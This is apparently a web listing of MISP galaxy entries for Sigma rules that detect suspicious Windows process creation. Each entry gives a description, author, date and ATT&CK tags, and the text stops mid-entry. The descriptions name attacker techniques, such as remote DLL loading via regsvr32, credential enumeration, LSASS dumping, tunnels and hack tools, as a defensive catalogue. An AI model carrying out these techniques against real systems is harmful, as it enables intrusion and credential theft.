Internal MISP references

UUID 2cf29f11-e356-4f61-98c0-1bdb9393d6da which can be used as unique global reference for Renamed Visual Studio Code Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/09/28
falsepositive ['Unknown']
filename proc_creation_win_vscode_tunnel_renamed_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071.001']
Related clusters

To see the related clusters, click here.

Verclsid.exe Runs COM Object

Detects when verclsid.exe is used to run COM object via GUID

Internal MISP references

UUID d06be4b9-8045-428b-a567-740a26d9db25 which can be used as unique global reference for Verclsid.exe Runs COM Object in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Victor Sergeev, oscd.community
creation_date 2020/10/09
falsepositive ['Unknown']
filename proc_creation_win_verclsid_runs_com.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potentially Suspicious Regsvr32 HTTP IP Pattern

Detects regsvr32 execution to download and install DLLs located remotely where the address is an IP address.

Internal MISP references

UUID 2dd2c217-bf68-437a-b57c-fe9fd01d5de8 which can be used as unique global reference for Potentially Suspicious Regsvr32 HTTP IP Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/01/11
falsepositive ['FQDNs that start with a number such as "7-Zip"']
filename proc_creation_win_regsvr32_http_ip_pattern.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218.010']
Related clusters

To see the related clusters, click here.

Potential Product Class Reconnaissance Via Wmic.EXE

Detects the execution of WMIC in order to get a list of firewall and antivirus products

Internal MISP references

UUID e568650b-5dcd-4658-8f34-ded0b1e13992 which can be used as unique global reference for Potential Product Class Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community
creation_date 2023/02/14
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_product_class.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1047', 'car.2016-03-002']
Related clusters

To see the related clusters, click here.

Potential Arbitrary File Download Using Office Application

Detects potential arbitrary file download using a Microsoft Office application

Internal MISP references

UUID 4ae3e30b-b03f-43aa-87e3-b622f4048eed which can be used as unique global reference for Potential Arbitrary File Download Using Office Application in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Beyu Denis, oscd.community
creation_date 2022/05/17
falsepositive ['Unknown']
filename proc_creation_win_office_arbitrary_cli_download.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Suspicious DumpMinitool Execution

Detects suspicious ways to use the "DumpMinitool.exe" binary

Internal MISP references

UUID eb1c4225-1c23-4241-8dd4-051389fde4ce which can be used as unique global reference for Suspicious DumpMinitool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unknown']
filename proc_creation_win_dumpminitool_susp_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1036', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Execution of Powershell Script in Public Folder

This rule detects execution of PowerShell scripts located in the "C:\Users\Public" folder

Internal MISP references

UUID fb9d3ff7-7348-46ab-af8c-b55f5fbf39b4 which can be used as unique global reference for Execution of Powershell Script in Public Folder in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Max Altgelt (Nextron Systems)
creation_date 2022/04/06
falsepositive ['Unlikely']
filename proc_creation_win_powershell_public_folder.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.t1059.001']
Related clusters

To see the related clusters, click here.

Use Short Name Path in Image

Detect use of the Windows 8.3 short name. Which could be used as a method to avoid Image detection

Internal MISP references

UUID a96970af-f126-420d-90e1-d37bf25e50e1 which can be used as unique global reference for Use Short Name Path in Image in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali
creation_date 2022/08/07
falsepositive ['Applications could use this notation occasionally which might generate some false positives. In that case Investigate the parent and child process.']
filename proc_creation_win_susp_ntfs_short_name_path_use_image.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1564.004']
Related clusters

To see the related clusters, click here.

Fsutil Suspicious Invocation

Detects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).

Internal MISP references

UUID add64136-62e5-48ea-807e-88638d02df1e which can be used as unique global reference for Fsutil Suspicious Invocation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Ecco, E.M. Anhaus, oscd.community
creation_date 2019/09/26
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment']
filename proc_creation_win_fsutil_usage.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.impact', 'attack.t1070', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Insensitive Subfolder Search Via Findstr.EXE

Detects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.

Internal MISP references

UUID 04936b66-3915-43ad-a8e5-809eadfd1141 which can be used as unique global reference for Insensitive Subfolder Search Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali (Nextron Systems)
creation_date 2020/10/05
falsepositive ['Administrative or software activity']
filename proc_creation_win_findstr_subfolder_search.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.t1564.004', 'attack.t1552.001', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Execute Pcwrun.EXE To Leverage Follina

Detects indirect command execution via Program Compatibility Assistant "pcwrun.exe" leveraging the follina (CVE-2022-30190) vulnerability

Internal MISP references

UUID 6004abd0-afa4-4557-ba90-49d172e0a299 which can be used as unique global reference for Execute Pcwrun.EXE To Leverage Follina in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/06/13
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_pcwrun_follina.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218', 'attack.execution']
Related clusters

To see the related clusters, click here.

Potential Reconnaissance Activity Via GatherNetworkInfo.VBS

Detects execution of the built-in script located in "C:\Windows\System32\gatherNetworkInfo.vbs". Which can be used to gather information about the target machine

Internal MISP references

UUID 575dce0c-8139-4e30-9295-1ee75969f7fe which can be used as unique global reference for Potential Reconnaissance Activity Via GatherNetworkInfo.VBS in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author blueteamer8699
creation_date 2022/01/03
falsepositive ['Administrative activity']
filename proc_creation_win_lolbin_gather_network_info.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1615', 'attack.t1059.005']
Related clusters

To see the related clusters, click here.

Potential PowerShell Execution Policy Tampering - ProcCreation

Detects changes to the PowerShell execution policy registry key in order to bypass signing requirements for script execution from the CommandLine

Internal MISP references

UUID cf2e938e-9a3e-4fe8-a347-411642b28a9f which can be used as unique global reference for Potential PowerShell Execution Policy Tampering - ProcCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/11
falsepositive ['Unknown']
filename proc_creation_win_registry_set_unsecure_powershell_policy.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion']

Renamed Sysinternals Sdelete Execution

Detects the use of a renamed SysInternals Sdelete, which is something an administrator shouldn't do (the renaming)

Internal MISP references

UUID c1d867fe-8d95-4487-aab4-e53f2d339f90 which can be used as unique global reference for Renamed Sysinternals Sdelete Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/09/06
falsepositive ['System administrator usage']
filename proc_creation_win_renamed_sysinternals_sdelete.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.impact', 'attack.t1485']
Related clusters

To see the related clusters, click here.

Shell Process Spawned by Java.EXE

Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. log4j exploitation)

Internal MISP references

UUID dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0 which can be used as unique global reference for Shell Process Spawned by Java.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Andreas Hunkeler (@Karneades), Nasreddine Bencherchali
creation_date 2021/12/17
falsepositive ['Legitimate calls to system binaries', 'Company specific internal usage']
filename proc_creation_win_java_susp_child_process_2.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']

Permission Misconfiguration Reconnaissance Via Findstr.EXE

Detects usage of findstr with the "EVERYONE" or "BUILTIN" keywords. This is seen being used in combination with "icacls" to look for misconfigured files or folders permissions

Internal MISP references

UUID 47e4bab7-c626-47dc-967b-255608c9a920 which can be used as unique global reference for Permission Misconfiguration Reconnaissance Via Findstr.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/08/12
falsepositive ['Unknown']
filename proc_creation_win_findstr_recon_everyone.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.006']
Related clusters

To see the related clusters, click here.

Cloudflared Tunnel Execution

Detects execution of the "cloudflared" tool to connect back to a tunnel. This was seen used by threat actors to maintain persistence and remote access to compromised networks.

Internal MISP references

UUID 9a019ffc-3580-4c9d-8d87-079f7e8d3fd4 which can be used as unique global reference for Cloudflared Tunnel Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Janantha Marasinghe, Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/05/17
falsepositive ['Legitimate usage of Cloudflared tunnel.']
filename proc_creation_win_cloudflared_tunnel_run.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1102', 'attack.t1090', 'attack.t1572']
Related clusters

To see the related clusters, click here.

File Decoded From Base64/Hex Via Certutil.EXE

Detects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution

Internal MISP references

UUID cc9cbe82-7bc0-4ef5-bc23-bbfb83947be7 which can be used as unique global reference for File Decoded From Base64/Hex Via Certutil.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community
creation_date 2023/02/15
falsepositive ['Unknown']
filename proc_creation_win_certutil_decode.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1027']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Created as System

Detection of child processes spawned with SYSTEM privileges by parents with LOCAL SERVICE or NETWORK SERVICE accounts

Internal MISP references

UUID 590a5f4c-6c8c-4f10-8307-89afe9453a9d which can be used as unique global reference for Suspicious Child Process Created as System in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov, Roberto Rodriguez (@Cyb3rWard0g), Open Threat Research (OTR)
creation_date 2019/10/26
falsepositive ['Unknown']
filename proc_creation_win_susp_child_process_as_system_.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1134.002']
Related clusters

To see the related clusters, click here.

AADInternals PowerShell Cmdlets Execution - ProccessCreation

Detects ADDInternals Cmdlet execution. A tool for administering Azure AD and Office 365. Which can be abused by threat actors to attack Azure AD or Office 365.

Internal MISP references

UUID c86500e9-a645-4680-98d7-f882c70c1ea3 which can be used as unique global reference for AADInternals PowerShell Cmdlets Execution - ProccessCreation in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer (@austinsonger), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/12/23
falsepositive ['Legitimate use of the library for administrative activity']
filename proc_creation_win_powershell_aadinternals_cmdlets_execution.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.reconnaissance', 'attack.discovery', 'attack.credential_access', 'attack.impact']

Remote Access Tool - Team Viewer Session Started On Windows Host

Detects the command line executed when TeamViewer starts a session started by a remote host. Once a connection has been started, an investigator can verify the connection details by viewing the "incoming_connections.txt" log file in the TeamViewer folder.

Internal MISP references

UUID ab70c354-d9ac-4e11-bbb6-ec8e3b153357 which can be used as unique global reference for Remote Access Tool - Team Viewer Session Started On Windows Host in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Josh Nickels, Qi Nan
creation_date 2024/03/11
falsepositive ['Legitimate usage of TeamViewer']
filename proc_creation_win_remote_access_tools_teamviewer_incoming_connection.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1133']
Related clusters

To see the related clusters, click here.

Suspicious TSCON Start as SYSTEM

Detects a tscon.exe start as LOCAL SYSTEM

Internal MISP references

UUID 9847f263-4a81-424f-970c-875dab15b79b which can be used as unique global reference for Suspicious TSCON Start as SYSTEM in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/03/17
falsepositive ['Unknown']
filename proc_creation_win_tscon_localsystem.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

Process Memory Dump Via Dotnet-Dump

Detects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS

Internal MISP references

UUID 53d8d3e1-ca33-4012-adf3-e05a4d652e34 which can be used as unique global reference for Process Memory Dump Via Dotnet-Dump in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/03/14
falsepositive ['Process dumping is the expected behavior of the tool. So false positives are expected in legitimate usage. The PID/Process Name of the process being dumped needs to be investigated']
filename proc_creation_win_lolbin_dotnet_dump.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Potential Discovery Activity Via Dnscmd.EXE

Detects an attempt to leverage dnscmd.exe to enumerate the DNS zones of a domain. DNS zones used to host the DNS records for a particular domain.

Internal MISP references

UUID b6457d63-d2a2-4e29-859d-4e7affc153d1 which can be used as unique global reference for Potential Discovery Activity Via Dnscmd.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author @gott_cyber
creation_date 2022/07/31
falsepositive ['Legitimate administration use']
filename proc_creation_win_dnscmd_discovery.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1543.003']
Related clusters

To see the related clusters, click here.

Suspicious Dump64.exe Execution

Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder

Internal MISP references

UUID 129966c9-de17-4334-a123-8b58172e664d which can be used as unique global reference for Suspicious Dump64.exe Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Austin Songer @austinsonger, Florian Roth
creation_date 2021/11/26
falsepositive ['Dump64.exe in other folders than the excluded one']
filename proc_creation_win_lolbin_dump64.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1003.001']
Related clusters

To see the related clusters, click here.

Suspicious Cmdl32 Execution

lolbas Cmdl32 is use to download a payload to evade antivirus

Internal MISP references

UUID f37aba28-a9e6-4045-882c-d5004043b337 which can be used as unique global reference for Suspicious Cmdl32 Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/11/03
falsepositive ['Unknown']
filename proc_creation_win_lolbin_cmdl32.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

PUA - CsExec Execution

Detects the use of the lesser known remote execution tool named CsExec a PsExec alternative

Internal MISP references

UUID d08a2711-ee8b-4323-bdec-b7d85e892b31 which can be used as unique global reference for PUA - CsExec Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2022/08/22
falsepositive ['Unknown']
filename proc_creation_win_pua_csexec.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.resource_development', 'attack.t1587.001', 'attack.execution', 'attack.t1569.002']
Related clusters

To see the related clusters, click here.

Windows Credential Manager Access via VaultCmd

List credentials currently stored in Windows Credential Manager via the native Windows utility vaultcmd.exe

Internal MISP references

UUID 58f50261-c53b-4c88-bd12-1d71f12eda4c which can be used as unique global reference for Windows Credential Manager Access via VaultCmd in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2022/04/08
falsepositive ['Unknown']
filename proc_creation_win_vaultcmd_list_creds.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555.004']
Related clusters

To see the related clusters, click here.

Suspicious Child Process Of SQL Server

Detects suspicious child processes of the SQLServer process. This could indicate potential RCE or SQL Injection.

Internal MISP references

UUID 869b9ca7-9ea2-4a5a-8325-e80e62f75445 which can be used as unique global reference for Suspicious Child Process Of SQL Server in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author FPT.EagleEye Team, wagga
creation_date 2020/12/11
falsepositive No established falsepositives
filename proc_creation_win_mssql_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.t1505.003', 'attack.t1190', 'attack.initial_access', 'attack.persistence', 'attack.privilege_escalation']
Related clusters

To see the related clusters, click here.

Remote Access Tool - ScreenConnect Server Web Shell Execution

Detects potential web shell execution from the ScreenConnect server process.

Internal MISP references

UUID b19146a3-25d4-41b4-928b-1e2a92641b1b which can be used as unique global reference for Remote Access Tool - ScreenConnect Server Web Shell Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Jason Rathbun (Blackpoint Cyber)
creation_date 2024/02/26
falsepositive ['Unlikely']
filename proc_creation_win_remote_access_tools_screenconnect_webshell.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.initial_access', 'attack.t1190']
Related clusters

To see the related clusters, click here.

WSL Child Process Anomaly

Detects uncommon or suspicious child processes spawning from a WSL process. This could indicate an attempt to evade parent/child relationship detections or persistence attempts via cron using WSL

Internal MISP references

UUID 2267fe65-0681-42ad-9a6d-46553d3f3480 which can be used as unique global reference for WSL Child Process Anomaly in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/01/23
falsepositive ['Unknown']
filename proc_creation_win_wsl_child_processes_anomalies.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.defense_evasion', 'attack.t1218', 'attack.t1202']
Related clusters

To see the related clusters, click here.

Mstsc.EXE Execution With Local RDP File

Detects potential RDP connection via Mstsc using a local ".rdp" file

Internal MISP references

UUID 5fdce3ac-e7f9-4ecd-a3aa-a4d78ebbf0af which can be used as unique global reference for Mstsc.EXE Execution With Local RDP File in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems), Christopher Peacock @securepeacock
creation_date 2023/04/18
falsepositive ['Likely with legitimate usage of ".rdp" files']
filename proc_creation_win_mstsc_run_local_rdp_file.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1219']
Related clusters

To see the related clusters, click here.

HackTool - SILENTTRINITY Stager Execution

Detects SILENTTRINITY stager use via PE metadata

Internal MISP references

UUID 03552375-cc2c-4883-bbe4-7958d5a980be which can be used as unique global reference for HackTool - SILENTTRINITY Stager Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Aleksey Potapov, oscd.community
creation_date 2019/10/22
falsepositive ['Unlikely']
filename proc_creation_win_hktl_silenttrinity_stager.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1071']
Related clusters

To see the related clusters, click here.

Computer System Reconnaissance Via Wmic.EXE

Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc.

Internal MISP references

UUID 9d7ca793-f6bd-471c-8d0f-11e68b2f0d2f which can be used as unique global reference for Computer System Reconnaissance Via Wmic.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/09/08
falsepositive ['Unknown']
filename proc_creation_win_wmic_recon_computersystem.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.execution', 'attack.t1047']
Related clusters

To see the related clusters, click here.

Always Install Elevated Windows Installer

Detects Windows Installer service (msiexec.exe) trying to install MSI packages with SYSTEM privilege

Internal MISP references

UUID cd951fdc-4b2f-47f5-ba99-a33bf61e3770 which can be used as unique global reference for Always Install Elevated Windows Installer in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Teymur Kheirkhabarov (idea), Mangatas Tondang (rule), oscd.community
creation_date 2020/10/13
falsepositive ['System administrator usage', 'Anti virus products', 'WindowsApps located in "C:\Program Files\WindowsApps\"']
filename proc_creation_win_susp_always_install_elevated_windows_installer.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.privilege_escalation', 'attack.t1548.002']
Related clusters

To see the related clusters, click here.

File Download From Browser Process Via Inline URL

Detects execution of a browser process with a URL argument pointing to a file with a potentially interesting extension. This can be abused to download arbitrary files or to hide from the user for example by launching the browser in a minimized state.

Internal MISP references

UUID 94771a71-ba41-4b6e-a757-b531372eaab6 which can be used as unique global reference for File Download From Browser Process Via Inline URL in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/01/11
falsepositive ['Unknown']
filename proc_creation_win_browsers_inline_file_download.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.command_and_control', 'attack.t1105']
Related clusters

To see the related clusters, click here.

Add Potential Suspicious New Download Source To Winget

Detects usage of winget to add new potentially suspicious download sources

Internal MISP references

UUID c15a46a0-07d4-4c87-b4b6-89207835a83b which can be used as unique global reference for Add Potential Suspicious New Download Source To Winget in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/04/17
falsepositive ['Unknown']
filename proc_creation_win_winget_add_susp_custom_source.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.execution', 'attack.t1059']
Related clusters

To see the related clusters, click here.

DLL Execution via Rasautou.exe

Detects using Rasautou.exe for loading arbitrary .DLL specified in -d option and executes the export specified in -p.

Internal MISP references

UUID cd3d1298-eb3b-476c-ac67-12847de55813 which can be used as unique global reference for DLL Execution via Rasautou.exe in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Julia Fomina, oscd.community
creation_date 2020/10/09
falsepositive ['Unlikely']
filename proc_creation_win_lolbin_rasautou_dll_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1218']
Related clusters

To see the related clusters, click here.

Enumeration for Credentials in Registry

Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services

Internal MISP references

UUID e0b0c2ab-3d52-46d9-8cb7-049dc775fbd1 which can be used as unique global reference for Enumeration for Credentials in Registry in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113
creation_date 2021/12/20
falsepositive ['Unknown']
filename proc_creation_win_reg_enumeration_for_credentials_in_registry.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1552.002']
Related clusters

To see the related clusters, click here.

Suspicious VBoxDrvInst.exe Parameters

Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys

Internal MISP references

UUID b7b19cb6-9b32-4fc4-a108-73f19acfe262 which can be used as unique global reference for Suspicious VBoxDrvInst.exe Parameters in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Konstantin Grishchenko, oscd.community
creation_date 2020/10/06
falsepositive ['Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process']
filename proc_creation_win_virtualbox_vboxdrvinst_execution.yml
level medium
logsource.category process_creation
logsource.product windows
tags ['attack.defense_evasion', 'attack.t1112']
Related clusters

To see the related clusters, click here.

Base64 MZ Header In CommandLine

Detects encoded base64 MZ header in the commandline

Internal MISP references

UUID 22e58743-4ac8-4a9f-bf19-00a0428d8c5f which can be used as unique global reference for Base64 MZ Header In CommandLine in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2022/07/12
falsepositive ['Unlikely']
filename proc_creation_win_susp_inline_base64_mz_header.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Suspicious File Download From IP Via Wget.EXE

Detects potentially suspicious file downloads directly from IP addresses using Wget.exe

Internal MISP references

UUID 17f0c0a8-8bd5-4ee0-8c5f-a342c0199f35 which can be used as unique global reference for Suspicious File Download From IP Via Wget.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Nasreddine Bencherchali (Nextron Systems)
creation_date 2023/07/27
falsepositive ['Unknown']
filename proc_creation_win_wget_download_direct_ip.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.execution']

Scheduled Task Creation Via Schtasks.EXE

Detects the creation of scheduled tasks by user accounts via the "schtasks" utility.

Internal MISP references

UUID 92626ddd-662c-49e3-ac59-f6535f12d189 which can be used as unique global reference for Scheduled Task Creation Via Schtasks.EXE in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2019/01/16
falsepositive ['Administrative activity', 'Software installation']
filename proc_creation_win_schtasks_creation.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.execution', 'attack.persistence', 'attack.privilege_escalation', 'attack.t1053.005', 'attack.s0111', 'car.2013-08-001', 'stp.1u']
Related clusters

To see the related clusters, click here.

HackTool - SharpMove Tool Execution

Detects the execution of SharpMove, a .NET utility performing multiple tasks such as "Task Creation", "SCM" query, VBScript execution using WMI via its PE metadata and command line options.

Internal MISP references

UUID 055fb54c-a8f4-4aee-bd44-f74cf30a0d9d which can be used as unique global reference for HackTool - SharpMove Tool Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Luca Di Bartolomeo (CrimpSec)
creation_date 2024/01/29
falsepositive ['Unknown']
filename proc_creation_win_hktl_sharpmove.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.lateral_movement', 'attack.t1021.002']
Related clusters

To see the related clusters, click here.

Suspicious Serv-U Process Pattern

Detects a suspicious process pattern which could be a sign of an exploited Serv-U service

Internal MISP references

UUID 58f4ea09-0fc2-4520-ba18-b85c540b0eaf which can be used as unique global reference for Suspicious Serv-U Process Pattern in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2021/07/14
falsepositive ['Legitimate uses in which users or programs use the SSH service of Serv-U for remote command execution']
filename proc_creation_win_servu_susp_child_process.yml
level high
logsource.category process_creation
logsource.product windows
tags ['attack.credential_access', 'attack.t1555', 'cve.2021.35211']
Related clusters

To see the related clusters, click here.

Suspicious Where Execution

Adversaries may enumerate browser bookmarks to learn more about compromised hosts. Browser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.

Internal MISP references

UUID 725a9768-0f5e-4cb3-aec2-bc5719c6831a which can be used as unique global reference for Suspicious Where Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author frack113, Nasreddine Bencherchali (Nextron Systems)
creation_date 2021/12/13
falsepositive ['Unknown']
filename proc_creation_win_where_browser_data_recon.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1217']
Related clusters

To see the related clusters, click here.

Whoami Utility Execution

Detects the execution of whoami, which is often used by attackers after exploitation / privilege escalation

Internal MISP references

UUID e28a5a99-da44-436d-b7a0-2afc20a5f413 which can be used as unique global reference for Whoami Utility Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
Metadata key Value
author Florian Roth (Nextron Systems)
creation_date 2018/08/13
falsepositive ['Admin activity', 'Scripts and administrative tools used in the monitored environment', 'Monitoring activity']
filename proc_creation_win_whoami_execution.yml
level low
logsource.category process_creation
logsource.product windows
tags ['attack.discovery', 'attack.t1033', 'car.2016-03-001']
Related clusters

To see the related clusters, click here.

HackTool - WinPwn Execution

Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.

Internal MISP references

UUID d557dc06-62e8-4468-a8e8-7984124908ce which can be used as unique global reference for HackTool - WinPwn Execution in MISP communities and other software using the MISP galaxy

External references
Associated metadata
